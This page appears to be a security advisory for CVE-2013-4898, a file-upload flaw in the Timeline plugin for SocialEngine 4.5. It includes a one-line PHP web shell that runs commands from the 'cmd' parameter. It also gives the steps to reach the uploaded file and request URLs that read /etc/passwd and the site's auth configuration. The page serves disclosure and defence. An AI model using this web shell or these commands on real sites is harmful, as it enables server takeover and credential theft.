SocialEngine 4.5 Sending php file in the timeline plugin

2014.02.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5 # Date: 2013-08-17 # Discovered by: Wesley Henrique Leite aka "spyk2r" # Vendor Homepage: http://webhive.com.ua/ # Software Link: http://webhive.com.ua/store/product.php?id_product=46 # Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5 # Vendor Notified: 2013-08-17 # CVE Notified: 2013-08-24 # CVE : CVE-2013-4898 + INTRODUCTION The plugin has the objective give you a better visual for the user profile, allowed the addition of cover image keeping the layout closest to the style of modern social networks, among other features. + DESCRIPTION OF VULNERABILITY Logged into the system, enter on profile page of your user. [my profile] http://[url]/index.php/profile/[profile-name] >> Click "Change Cover" >> Click "Upload Cover" select the file "*.php" you want to send. //### Example PHP file to send "inject.php" ### <?php echo system("$_GET['cmd']"); ?> //### After selecting the file upload, this will be sent to an area temporarily, the system detects that the format is not valid, but doesn’t remove, allowing access later. an error message is displayed on the screen. [ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php" is not an image or does not exist ] + ACCESS /srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php The important thing is the structure of public forward, it will give us access to our archive. http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php

References:

http://www.securityfocus.com/archive/1/527791
http://www.exploit-db.com/exploits/27272/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top